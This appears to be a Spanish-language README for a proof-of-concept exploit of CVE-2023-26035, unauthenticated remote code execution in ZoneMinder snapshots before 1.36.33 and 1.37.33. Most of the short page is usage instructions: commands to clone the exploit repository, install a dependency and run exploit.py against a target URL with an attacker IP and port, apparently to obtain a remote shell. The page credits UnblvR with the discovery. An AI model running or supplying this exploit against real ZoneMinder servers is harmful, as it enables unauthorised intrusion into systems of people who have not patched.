
RCE no autenticado en instantáneas de ZoneMinder - Exploit PoC
RCE no autenticado en ZoneMinder Snapshots - Exploit PoC
alt img
Las versiones de ZoneMinder anteriores a 1.36.33 y 1.37.33 son vulnerables a la ejecución remota de código no autenticada debido a la falta de controles de autorización en la acción de snapshot.
git clone https://github.com/rvizx/CVE-2023-26035
cd CVE-2023-26035
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
UnblvR descubrió la vulnerabilidad.